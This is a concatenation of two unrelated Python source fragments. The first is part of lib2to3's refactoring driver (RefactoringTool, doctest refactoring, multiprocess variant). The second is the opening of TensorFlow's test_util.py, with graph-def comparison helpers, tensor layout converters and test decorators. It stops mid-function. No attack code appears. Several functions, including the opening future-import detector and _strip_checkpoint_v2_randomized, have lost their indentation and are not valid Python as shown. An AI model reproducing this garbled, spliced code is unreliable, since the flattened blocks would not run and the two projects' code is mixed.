gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
return tok[0], tok[1]
ignore = frozenset({token.NEWLINE, tokenize.NL, token.COMMENT})
features = set()
try:
while True:
tp, value = advance()
if tp in ignore:
continue
elif tp == token.STRING:
if have_docstring:
break
have_docstring = True
elif tp == token.NAME and value == "from":
tp, value = advance()
if tp != token.NAME or value != "__future__":
break
tp, value = advance()
if tp != token.NAME or value != "import":
break
tp, value = advance()
if tp == token.OP and value == "(":
tp, value = advance()
while tp == token.NAME:
features.add(value)
tp, value = advance()
if tp != token.OP or value != ",":
break
tp, value = advance()
else:
break
except StopIteration:
pass
return frozenset(features)
class FixerError(Exception):
    """Raised when a fixer module or its fixer class cannot be loaded."""
class RefactoringTool(object):
    """Drives the refactoring process.

    Loads the requested fixers, parses input sources into pytree ASTs,
    applies matching fixers (via the bottom matcher where compatible,
    otherwise by tree traversal), and optionally writes results back.
    """

    _default_options = {"print_function" : False,
                        "write_unchanged_files" : False}

    CLASS_PREFIX = "Fix" # The prefix for fixer classes
    FILE_PREFIX = "fix_" # The prefix for modules with a fixer within

    def __init__(self, fixer_names, options=None, explicit=None):
        """Initializer.

        Args:
            fixer_names: a list of fixers to import
            options: a dict with configuration.
            explicit: a list of fixers to run even if they are explicit.
        """
        self.fixers = fixer_names
        self.explicit = explicit or []
        self.options = self._default_options.copy()
        if options is not None:
            self.options.update(options)
        if self.options["print_function"]:
            self.grammar = pygram.python_grammar_no_print_statement
        else:
            self.grammar = pygram.python_grammar
        # When this is True, the refactor*() methods will call write_file() for
        # files processed even if they were not changed during refactoring. If
        # and only if the refactor method's write parameter was True.
        self.write_unchanged_files = self.options.get("write_unchanged_files")
        self.errors = []
        self.logger = logging.getLogger("RefactoringTool")
        self.fixer_log = []
        self.wrote = False
        self.driver = driver.Driver(self.grammar,
                                    convert=pytree.convert,
                                    logger=self.logger)
        self.pre_order, self.post_order = self.get_fixers()

        self.files = []  # List of files that were or should be modified

        self.BM = bm.BottomMatcher()
        self.bmi_pre_order = []  # Bottom Matcher incompatible fixers
        self.bmi_post_order = []

        # Partition fixers: BM-compatible ones go into the bottom matcher,
        # the rest keep their traditional pre/post traversal ordering.
        for fixer in chain(self.post_order, self.pre_order):
            if fixer.BM_compatible:
                self.BM.add_fixer(fixer)
                # remove fixers that will be handled by the bottom-up
                # matcher
            elif fixer in self.pre_order:
                self.bmi_pre_order.append(fixer)
            elif fixer in self.post_order:
                self.bmi_post_order.append(fixer)

        self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
        self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)

    def get_fixers(self):
        """Inspects the options to load the requested patterns and handlers.

        Returns:
          (pre_order, post_order), where pre_order is the list of fixers that
          want a pre-order AST traversal, and post_order is the list that want
          post-order traversal.
        """
        pre_order_fixers = []
        post_order_fixers = []
        for fix_mod_path in self.fixers:
            mod = __import__(fix_mod_path, {}, {}, ["*"])
            fix_name = fix_mod_path.rsplit(".", 1)[-1]
            if fix_name.startswith(self.FILE_PREFIX):
                fix_name = fix_name[len(self.FILE_PREFIX):]
            parts = fix_name.split("_")
            # Module fix_foo_bar -> class FixFooBar.
            class_name = self.CLASS_PREFIX + "".join([p.title() for p in parts])
            try:
                fix_class = getattr(mod, class_name)
            except AttributeError:
                raise FixerError("Can't find %s.%s" % (fix_name, class_name)) from None
            fixer = fix_class(self.options, self.fixer_log)
            # Explicit (optional) fixers run only when requested by name,
            # unless self.explicit is True (meaning "run all").
            if fixer.explicit and self.explicit is not True and \
                    fix_mod_path not in self.explicit:
                self.log_message("Skipping optional fixer: %s", fix_name)
                continue

            self.log_debug("Adding transformation: %s", fix_name)
            if fixer.order == "pre":
                pre_order_fixers.append(fixer)
            elif fixer.order == "post":
                post_order_fixers.append(fixer)
            else:
                raise FixerError("Illegal fixer order: %r" % fixer.order)

        key_func = operator.attrgetter("run_order")
        pre_order_fixers.sort(key=key_func)
        post_order_fixers.sort(key=key_func)
        return (pre_order_fixers, post_order_fixers)

    def log_error(self, msg, *args, **kwds):
        """Called when an error occurs."""
        # Bare raise re-raises the exception currently being handled; callers
        # invoke this from inside except blocks. Subclasses may override to
        # record the error instead of aborting.
        raise

    def log_message(self, msg, *args):
        """Hook to log a message."""
        if args:
            msg = msg % args
        self.logger.info(msg)

    def log_debug(self, msg, *args):
        """Hook to log a debug message."""
        if args:
            msg = msg % args
        self.logger.debug(msg)

    def print_output(self, old_text, new_text, filename, equal):
        """Called with the old version, new version, and filename of a
        refactored file."""
        pass

    def refactor(self, items, write=False, doctests_only=False):
        """Refactor a list of files and directories."""
        for dir_or_file in items:
            if os.path.isdir(dir_or_file):
                self.refactor_dir(dir_or_file, write, doctests_only)
            else:
                self.refactor_file(dir_or_file, write, doctests_only)

    def refactor_dir(self, dir_name, write=False, doctests_only=False):
        """Descends down a directory and refactor every Python file found.

        Python files are assumed to have a .py extension.

        Files and subdirectories starting with '.' are skipped.
        """
        py_ext = os.extsep + "py"
        for dirpath, dirnames, filenames in os.walk(dir_name):
            self.log_debug("Descending into %s", dirpath)
            # Sort for deterministic traversal order.
            dirnames.sort()
            filenames.sort()
            for name in filenames:
                if (not name.startswith(".") and
                        os.path.splitext(name)[1] == py_ext):
                    fullname = os.path.join(dirpath, name)
                    self.refactor_file(fullname, write, doctests_only)
            # Modify dirnames in-place to remove subdirs with leading dots
            dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]

    def _read_python_source(self, filename):
        """
        Do our best to decode a Python source file correctly.
        """
        try:
            f = open(filename, "rb")
        except OSError as err:
            self.log_error("Can't open %s: %s", filename, err)
            return None, None
        try:
            # Honor PEP 263 coding cookies / BOM when decoding the source.
            encoding = tokenize.detect_encoding(f.readline)[0]
        finally:
            f.close()
        with io.open(filename, "r", encoding=encoding, newline='') as f:
            return f.read(), encoding

    def refactor_file(self, filename, write=False, doctests_only=False):
        """Refactors a file."""
        input, encoding = self._read_python_source(filename)
        if input is None:
            # Reading the file failed.
            return
        input += "\n" # Silence certain parse errors
        if doctests_only:
            self.log_debug("Refactoring doctests in %s", filename)
            output = self.refactor_docstring(input, filename)
            if self.write_unchanged_files or output != input:
                self.processed_file(output, filename, input, write, encoding)
            else:
                self.log_debug("No doctest changes in %s", filename)
        else:
            tree = self.refactor_string(input, filename)
            if self.write_unchanged_files or (tree and tree.was_changed):
                # The [:-1] is to take off the \n we added earlier
                self.processed_file(str(tree)[:-1], filename,
                                    write=write, encoding=encoding)
            else:
                self.log_debug("No changes in %s", filename)

    def refactor_string(self, data, name):
        """Refactor a given input string.

        Args:
            data: a string holding the code to be refactored.
            name: a human-readable name for use in error/log messages.

        Returns:
            An AST corresponding to the refactored input stream; None if
            there were errors during the parse.
        """
        features = _detect_future_features(data)
        if "print_function" in features:
            self.driver.grammar = pygram.python_grammar_no_print_statement
        try:
            tree = self.driver.parse_string(data)
        except Exception as err:
            self.log_error("Can't parse %s: %s: %s",
                           name, err.__class__.__name__, err)
            return
        finally:
            # Restore the default grammar regardless of parse outcome.
            self.driver.grammar = self.grammar
        tree.future_features = features
        self.log_debug("Refactoring %s", name)
        self.refactor_tree(tree, name)
        return tree

    def refactor_stdin(self, doctests_only=False):
        """Refactor source read from stdin; results go to processed_file()."""
        input = sys.stdin.read()
        if doctests_only:
            self.log_debug("Refactoring doctests in stdin")
            output = self.refactor_docstring(input, "<stdin>")
            if self.write_unchanged_files or output != input:
                self.processed_file(output, "<stdin>", input)
            else:
                self.log_debug("No doctest changes in stdin")
        else:
            tree = self.refactor_string(input, "<stdin>")
            if self.write_unchanged_files or (tree and tree.was_changed):
                self.processed_file(str(tree), "<stdin>", input)
            else:
                self.log_debug("No changes in stdin")

    def refactor_tree(self, tree, name):
        """Refactors a parse tree (modifying the tree in place).

        For compatible patterns the bottom matcher module is
        used. Otherwise the tree is traversed node-to-node for
        matches.

        Args:
            tree: a pytree.Node instance representing the root of the tree
                to be refactored.
            name: a human-readable name for this tree.

        Returns:
            True if the tree was modified, False otherwise.
        """

        for fixer in chain(self.pre_order, self.post_order):
            fixer.start_tree(tree, name)

        #use traditional matching for the incompatible fixers
        self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
        self.traverse_by(self.bmi_post_order_heads, tree.post_order())

        # obtain a set of candidate nodes
        match_set = self.BM.run(tree.leaves())

        # Keep applying fixers until no candidate nodes remain; transforms
        # may add new matches for code they introduce.
        while any(match_set.values()):
            for fixer in self.BM.fixers:
                if fixer in match_set and match_set[fixer]:
                    #sort by depth; apply fixers from bottom(of the AST) to top
                    match_set[fixer].sort(key=pytree.Base.depth, reverse=True)

                    if fixer.keep_line_order:
                        #some fixers(eg fix_imports) must be applied
                        #with the original file's line order
                        match_set[fixer].sort(key=pytree.Base.get_lineno)

                    for node in list(match_set[fixer]):
                        if node in match_set[fixer]:
                            match_set[fixer].remove(node)

                        try:
                            find_root(node)
                        except ValueError:
                            # this node has been cut off from a
                            # previous transformation ; skip
                            continue

                        if node.fixers_applied and fixer in node.fixers_applied:
                            # do not apply the same fixer again
                            continue

                        results = fixer.match(node)

                        if results:
                            new = fixer.transform(node, results)
                            if new is not None:
                                node.replace(new)
                                #new.fixers_applied.append(fixer)
                                for node in new.post_order():
                                    # do not apply the fixer again to
                                    # this or any subnode
                                    if not node.fixers_applied:
                                        node.fixers_applied = []
                                    node.fixers_applied.append(fixer)

                                # update the original match set for
                                # the added code
                                new_matches = self.BM.run(new.leaves())
                                for fxr in new_matches:
                                    if not fxr in match_set:
                                        match_set[fxr]=[]

                                    match_set[fxr].extend(new_matches[fxr])

        for fixer in chain(self.pre_order, self.post_order):
            fixer.finish_tree(tree, name)
        return tree.was_changed

    def traverse_by(self, fixers, traversal):
        """Traverse an AST, applying a set of fixers to each node.

        This is a helper method for refactor_tree().

        Args:
            fixers: a list of fixer instances.
            traversal: a generator that yields AST nodes.

        Returns:
            None
        """
        if not fixers:
            return
        for node in traversal:
            for fixer in fixers[node.type]:
                results = fixer.match(node)
                if results:
                    new = fixer.transform(node, results)
                    if new is not None:
                        node.replace(new)
                        # Continue matching against the replacement node.
                        node = new

    def processed_file(self, new_text, filename, old_text=None, write=False,
                       encoding=None):
        """
        Called when a file has been refactored and there may be changes.
        """
        self.files.append(filename)
        if old_text is None:
            old_text = self._read_python_source(filename)[0]
            if old_text is None:
                return
        equal = old_text == new_text
        self.print_output(old_text, new_text, filename, equal)
        if equal:
            self.log_debug("No changes to %s", filename)
            if not self.write_unchanged_files:
                return
        if write:
            self.write_file(new_text, filename, old_text, encoding)
        else:
            self.log_debug("Not writing changes to %s", filename)

    def write_file(self, new_text, filename, old_text, encoding=None):
        """Writes a string to a file.

        It first shows a unified diff between the old text and the new text, and
        then rewrites the file; the latter is only done if the write option is
        set.
        """
        try:
            fp = io.open(filename, "w", encoding=encoding, newline='')
        except OSError as err:
            self.log_error("Can't create %s: %s", filename, err)
            return

        with fp:
            try:
                fp.write(new_text)
            except OSError as err:
                self.log_error("Can't write %s: %s", filename, err)
        self.log_debug("Wrote changes to %s", filename)
        self.wrote = True

    PS1 = ">>> "
    PS2 = "... "

    def refactor_docstring(self, input, filename):
        """Refactors a docstring, looking for doctests.

        This returns a modified version of the input string.  It looks
        for doctests, which start with a ">>>" prompt, and may be
        continued with "..." prompts, as long as the "..." is indented
        the same as the ">>>".

        (Unfortunately we can't use the doctest module's parser,
        since, like most parsers, it is not geared towards preserving
        the original source.)
        """
        result = []
        block = None            # lines of the doctest currently being collected
        block_lineno = None     # 1-based line number where that block started
        indent = None           # leading whitespace shared by the block
        lineno = 0
        for line in input.splitlines(keepends=True):
            lineno += 1
            if line.lstrip().startswith(self.PS1):
                if block is not None:
                    result.extend(self.refactor_doctest(block, block_lineno,
                                                        indent, filename))
                block_lineno = lineno
                block = [line]
                i = line.find(self.PS1)
                indent = line[:i]
            elif (indent is not None and
                  (line.startswith(indent + self.PS2) or
                   line == indent + self.PS2.rstrip() + "\n")):
                block.append(line)
            else:
                if block is not None:
                    result.extend(self.refactor_doctest(block, block_lineno,
                                                        indent, filename))
                block = None
                indent = None
                result.append(line)
        if block is not None:
            result.extend(self.refactor_doctest(block, block_lineno,
                                                indent, filename))
        return "".join(result)

    def refactor_doctest(self, block, lineno, indent, filename):
        """Refactors one doctest.

        A doctest is given as a block of lines, the first of which starts
        with ">>>" (possibly indented), while the remaining lines start
        with "..." (identically indented).

        """
        try:
            tree = self.parse_block(block, lineno, indent)
        except Exception as err:
            if self.logger.isEnabledFor(logging.DEBUG):
                for line in block:
                    self.log_debug("Source: %s", line.rstrip("\n"))
            self.log_error("Can't parse docstring in %s line %s: %s: %s",
                           filename, lineno, err.__class__.__name__, err)
            return block
        if self.refactor_tree(tree, filename):
            new = str(tree).splitlines(keepends=True)
            # Undo the adjustment of the line numbers in wrap_toks() below.
            clipped, new = new[:lineno-1], new[lineno-1:]
            assert clipped == ["\n"] * (lineno-1), clipped
            if not new[-1].endswith("\n"):
                new[-1] += "\n"
            # Re-attach the doctest prompts that gen_lines() stripped.
            block = [indent + self.PS1 + new.pop(0)]
            if new:
                block += [indent + self.PS2 + line for line in new]
        return block

    def summarize(self):
        """Logs a human-readable summary of the refactoring session."""
        if self.wrote:
            were = "were"
        else:
            were = "need to be"
        if not self.files:
            self.log_message("No files %s modified.", were)
        else:
            self.log_message("Files that %s modified:", were)
            for file in self.files:
                self.log_message(file)
        if self.fixer_log:
            self.log_message("Warnings/messages while refactoring:")
            for message in self.fixer_log:
                self.log_message(message)
        if self.errors:
            if len(self.errors) == 1:
                self.log_message("There was 1 error:")
            else:
                self.log_message("There were %d errors:", len(self.errors))
            for msg, args, kwds in self.errors:
                self.log_message(msg, *args, **kwds)

    def parse_block(self, block, lineno, indent):
        """Parses a block into a tree.

        This is necessary to get correct line number / offset information
        in the parser diagnostics and embedded into the parse tree.
        """
        tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
        tree.future_features = frozenset()
        return tree

    def wrap_toks(self, block, lineno, indent):
        """Wraps a tokenize stream to systematically modify start/end."""
        tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
        for type, value, (line0, col0), (line1, col1), line_text in tokens:
            # Shift line numbers so diagnostics point into the original file.
            line0 += lineno - 1
            line1 += lineno - 1
            # Don't bother updating the columns; this is too complicated
            # since line_text would also have to be updated and it would
            # still break for tokens spanning lines.  Let the user guess
            # that the column numbers for doctests are relative to the
            # end of the prompt string (PS1 or PS2).
            yield type, value, (line0, col0), (line1, col1), line_text

    def gen_lines(self, block, indent):
        """Generates lines as expected by tokenize from a list of lines.

        This strips the first len(indent + self.PS1) characters off each line.
        """
        prefix1 = indent + self.PS1
        prefix2 = indent + self.PS2
        prefix = prefix1
        for line in block:
            if line.startswith(prefix):
                yield line[len(prefix):]
            elif line == prefix.rstrip() + "\n":
                yield "\n"
            else:
                raise AssertionError("line=%r, prefix=%r" % (line, prefix))
            # Only the first line may carry PS1; the rest must carry PS2.
            prefix = prefix2
        while True:
            yield ""
class MultiprocessingUnsupported(Exception):
    """Raised when the multiprocessing module cannot be imported."""
class MultiprocessRefactoringTool(RefactoringTool):
    """RefactoringTool that can fan out refactor_file() work to several
    worker processes through a multiprocessing.JoinableQueue."""

    def __init__(self, *args, **kwargs):
        super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
        # Both are created lazily in refactor(); a non-None queue signals
        # that a multi-process refactor is currently in progress.
        self.queue = None
        self.output_lock = None

    def refactor(self, items, write=False, doctests_only=False,
                 num_processes=1):
        """Refactor items; with num_processes > 1, dispatch files to workers.

        Raises:
            MultiprocessingUnsupported: if multiprocessing cannot be imported.
            RuntimeError: if a multi-process refactor is already running.
        """
        if num_processes == 1:
            return super(MultiprocessRefactoringTool, self).refactor(
                items, write, doctests_only)
        try:
            import multiprocessing
        except ImportError:
            raise MultiprocessingUnsupported
        if self.queue is not None:
            raise RuntimeError("already doing multiple processes")
        self.queue = multiprocessing.JoinableQueue()
        self.output_lock = multiprocessing.Lock()
        processes = [multiprocessing.Process(target=self._child)
                     for i in range(num_processes)]
        try:
            for p in processes:
                p.start()
            # The parent's overridden refactor_file() enqueues tasks instead
            # of processing them (see below).
            super(MultiprocessRefactoringTool, self).refactor(items, write,
                                                              doctests_only)
        finally:
            self.queue.join()
            # One None sentinel per worker tells it to shut down.
            for i in range(num_processes):
                self.queue.put(None)
            for p in processes:
                if p.is_alive():
                    p.join()
            self.queue = None

    def _child(self):
        """Worker loop: process queued (args, kwargs) tasks until sentinel."""
        task = self.queue.get()
        while task is not None:
            args, kwargs = task
            try:
                super(MultiprocessRefactoringTool, self).refactor_file(
                    *args, **kwargs)
            finally:
                # Always acknowledge the task so queue.join() can't hang.
                self.queue.task_done()
            task = self.queue.get()

    def refactor_file(self, *args, **kwargs):
        """Enqueue the file when running multi-process, else refactor inline."""
        if self.queue is not None:
            self.queue.put((args, kwargs))
        else:
            return super(MultiprocessRefactoringTool, self).refactor_file(
                *args, **kwargs)
|
test_util.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import gc
import itertools
import math
import random
import re
import tempfile
import threading
import unittest
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import tape # pylint: disable=unused-import
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
  """Returns the name of a GPU device if available or the empty string."""
  # SYCL devices are treated as GPU-like for this query.
  gpu_like_types = ("GPU", "SYCL")
  for device in device_lib.list_local_devices():
    if device.device_type in gpu_like_types:
      return compat.as_str(device.name)
  return ""
def assert_ops_in_graph(expected_ops, graph):
  """Assert all expected operations are found.

  Args:
    expected_ops: `dict<string, string>` of op name to op type.
    graph: Graph to check.

  Returns:
    `dict<string, node>` of node name to node.

  Raises:
    ValueError: If the expected ops are not present in the graph.
  """
  actual_ops = {}
  graph_def = graph.as_graph_def()
  for node in graph_def.node:
    name = node.name
    if name not in expected_ops:
      continue
    # Name matched: the op type must match too.
    if expected_ops[name] != node.op:
      raise ValueError("Expected op for node %s is different. %s vs %s" %
                       (name, expected_ops[name], node.op))
    actual_ops[name] = node
  if set(expected_ops.keys()) != set(actual_ops.keys()):
    raise ValueError("Not all expected ops are present. Expected %s, found %s" %
                     (expected_ops.keys(), actual_ops.keys()))
  return actual_ops
@tf_export("test.assert_equal_graph_def")
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
  """Asserts that two `GraphDef`s are (mostly) the same.

  Compares two `GraphDef` protos for equality, ignoring versions and ordering of
  nodes, attrs, and control inputs.  Node names are used to match up nodes
  between the graphs, so the naming of nodes must be consistent.

  Args:
    actual: The `GraphDef` we have.
    expected: The `GraphDef` we expected.
    checkpoint_v2: boolean determining whether to ignore randomized attribute
      values that appear in V2 checkpoints.

  Raises:
    AssertionError: If the `GraphDef`s do not match.
    TypeError: If either argument is not a `GraphDef`.
  """
  if not isinstance(actual, graph_pb2.GraphDef):
    raise TypeError(
        "Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
  if not isinstance(expected, graph_pb2.GraphDef):
    raise TypeError(
        "Expected tf.GraphDef for expected, got %s" % type(expected).__name__)

  if checkpoint_v2:
    # Drop nondeterministic V2-checkpoint temp-path attribute values from
    # both graphs before comparing.
    for graph_def in (actual, expected):
      _strip_checkpoint_v2_randomized(graph_def)

  difference = pywrap_tensorflow.EqualGraphDefWrapper(
      actual.SerializeToString(), expected.SerializeToString())
  if difference:
    raise AssertionError(compat.as_str(difference))
def assert_meta_graph_protos_equal(tester, a, b):
  """Compares MetaGraphDefs `a` and `b` in unit test class `tester`.

  Note: mutates `a` and `b` (clears `collection_def` and `graph_def` after
  comparing them field-by-field).

  Args:
    tester: a unittest.TestCase-like object providing assertEqual and
      assertProtoEquals.
    a: first MetaGraphDef proto.
    b: second MetaGraphDef proto.
  """
  # Carefully check the collection_defs
  tester.assertEqual(set(a.collection_def), set(b.collection_def))
  collection_keys = a.collection_def.keys()
  for k in collection_keys:
    a_value = a.collection_def[k]
    b_value = b.collection_def[k]
    proto_type = ops.get_collection_proto_type(k)
    if proto_type:
      a_proto = proto_type()
      b_proto = proto_type()
      # Number of entries in the collections is the same
      tester.assertEqual(
          len(a_value.bytes_list.value), len(b_value.bytes_list.value))
      for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
                                              b_value.bytes_list.value):
        a_proto.ParseFromString(a_value_item)
        b_proto.ParseFromString(b_value_item)
        tester.assertProtoEquals(a_proto, b_proto)
    else:
      # Fixed: assertEquals is a deprecated alias of assertEqual (removed
      # from unittest in Python 3.12).
      tester.assertEqual(a_value, b_value)
  # Compared the fields directly, remove their raw values from the
  # proto comparison below.
  a.ClearField("collection_def")
  b.ClearField("collection_def")

  # Check the graph_defs.
  assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
  # Check graph_def versions (ignored by assert_equal_graph_def).
  tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
  # Compared the fields directly, remove their raw values from the
  # proto comparison below.
  a.ClearField("graph_def")
  b.ClearField("graph_def")

  tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
  """Thin wrapper over the pywrap_tensorflow binding of the same name."""
  return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
  """Thin wrapper over the pywrap_tensorflow binding of the same name."""
  return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
  """Thin wrapper over the pywrap_tensorflow binding of the same name."""
  return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
  """Installs the native stack trace handler.

  Note: the underlying binding spells it "Stacktrace" (lowercase t), unlike
  this wrapper's name.
  """
  pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
  """Converts the input from the NHWC format to NCHW.

  Args:
    input_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    converted tensor or shape array
  """
  # tensor dim -> new axis order
  axis_order = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
  if not isinstance(input_tensor, ops.Tensor):
    # Plain shape list/tuple: permute the entries directly.
    order = axis_order[len(input_tensor)]
    return [input_tensor[axis] for axis in order]
  return array_ops.transpose(input_tensor, axis_order[input_tensor.shape.ndims])
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
  """Transforms the input from the NHWC layout to NCHW_VECT_C layout.

  Note: Does not include quantization or type conversion steps, which should
  be applied afterwards.

  Args:
    input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    tensor or shape array transformed into NCHW_VECT_C

  Raises:
    ValueError: if last dimension of `input_shape_or_tensor` is not evenly
      divisible by 4.
  """
  permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
  is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
  shape = (input_shape_or_tensor.shape.as_list()
           if is_tensor else input_shape_or_tensor)
  if shape[-1] % 4 != 0:
    raise ValueError(
        "Last dimension of input must be evenly divisible by 4 to convert to "
        "NCHW_VECT_C.")
  # Split the channel dimension into (channels // 4, 4).
  shape[-1] //= 4
  shape.append(4)
  permutation = permutations[len(shape)]
  if not is_tensor:
    return [shape[axis] for axis in permutation]
  reshaped = array_ops.reshape(input_shape_or_tensor, shape)
  return array_ops.transpose(reshaped, permutation)
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
  """Transforms the input from the NCHW_VECT_C layout to NHWC layout.

  Note: Does not include de-quantization or type conversion steps, which should
  be applied beforehand.

  Args:
    input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape

  Returns:
    tensor or shape array transformed into NHWC

  Raises:
    ValueError: if last dimension of `input_shape_or_tensor` is not 4.
  """
  permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
  is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
  input_shape = (input_shape_or_tensor.shape.as_list()
                 if is_tensor else input_shape_or_tensor)
  if input_shape[-1] != 4:
    raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
  permutation = permutations[len(input_shape)]
  # Fold the trailing vector-of-4 back into the channel dimension.
  nhwc_shape = [input_shape[axis] for axis in permutation[:-1]]
  nhwc_shape[-1] *= input_shape[-1]
  if not is_tensor:
    return nhwc_shape
  transposed = array_ops.transpose(input_shape_or_tensor, permutation)
  return array_ops.reshape(transposed, nhwc_shape)
def NCHWToNHWC(input_tensor):
  """Converts the input from the NCHW format to NHWC.

  Args:
    input_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    converted tensor or shape array
  """
  # tensor dim -> new axis order
  axis_order = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
  if not isinstance(input_tensor, ops.Tensor):
    # Plain shape list/tuple: permute the entries directly.
    order = axis_order[len(input_tensor)]
    return [input_tensor[axis] for axis in order]
  return array_ops.transpose(input_tensor, axis_order[input_tensor.shape.ndims])
def skip_if(condition):
  """Skips the decorated function if condition is or evaluates to True.

  Args:
    condition: Either an expression that can be used in "if not condition"
      statement, or a callable whose result should be a boolean.

  Returns:
    The wrapped function
  """

  def real_skip_if(fn):

    def wrapper(*args, **kwargs):
      # A callable condition is evaluated at call time, not decoration time.
      should_skip = condition() if callable(condition) else condition
      if not should_skip:
        fn(*args, **kwargs)

    return wrapper

  return real_skip_if
def enable_c_shapes(fn):
  """Decorator for enabling C shapes on a test.

  Note this enables the C shapes after running the test class's setup/teardown
  methods.

  Args:
    fn: the function to be wrapped

  Returns:
    The wrapped function
  """

  # pylint: disable=protected-access
  def wrapper(*args, **kwargs):
    saved_flag = ops._USE_C_SHAPES
    ops._USE_C_SHAPES = True
    try:
      fn(*args, **kwargs)
    finally:
      # Always restore the previous flag value, even if the test raised.
      ops._USE_C_SHAPES = saved_flag
  # pylint: enable=protected-access

  return wrapper
def with_c_shapes(cls):
  """Adds methods that call original methods but with C API shapes enabled.

  Note this enables C shapes in new methods after running the test class's
  setup method.

  Args:
    cls: class to decorate

  Returns:
    cls with new test methods added
  """
  # If C shapes are already enabled, don't do anything. Some tests break if the
  # same test is run twice, so this allows us to turn on the C shapes by default
  # without breaking these tests.
  if ops._USE_C_SHAPES:
    return cls

  test_methods = [(name, value)
                  for name, value in cls.__dict__.copy().items()
                  if name.startswith("test") and callable(value)]
  for name, method in test_methods:
    setattr(cls, name + "WithCShapes", enable_c_shapes(method))
  return cls
def assert_no_new_pyobjects_executing_eagerly(f):
  """Decorator for asserting that no new Python objects persist after a test.

  Runs the test multiple times executing eagerly, first as a warmup and then
  several times to let objects accumulate. The warmup helps ignore caches which
  do not grow as the test is run repeatedly.

  Useful for checking that there are no missing Py_DECREFs in the C exercised by
  a bit of Python.
  """

  def decorator(self, **kwargs):
    """Warms up, gets an object count, runs the test, checks for new objects."""
    with context.eager_mode():
      # Disable automatic GC so the object counts below are deterministic.
      gc.disable()
      # Warmup run to populate any lazy caches.
      f(self, **kwargs)
      gc.collect()
      previous_count = len(gc.get_objects())
      collection_sizes_before = {
          collection: len(ops.get_collection(collection))
          for collection in ops.get_default_graph().collections}
      for _ in range(3):
        f(self, **kwargs)
      # Note that gc.get_objects misses anything that isn't subject to garbage
      # collection (C types). Collections are a common source of leaks, so we
      # test for collection sizes explicitly.
      for collection_key in ops.get_default_graph().collections:
        collection = ops.get_collection(collection_key)
        size_before = collection_sizes_before.get(collection_key, 0)
        if len(collection) > size_before:
          raise AssertionError(
              ("Collection %s increased in size from "
               "%d to %d (current items %s).")
              % (collection_key, size_before, len(collection), collection))
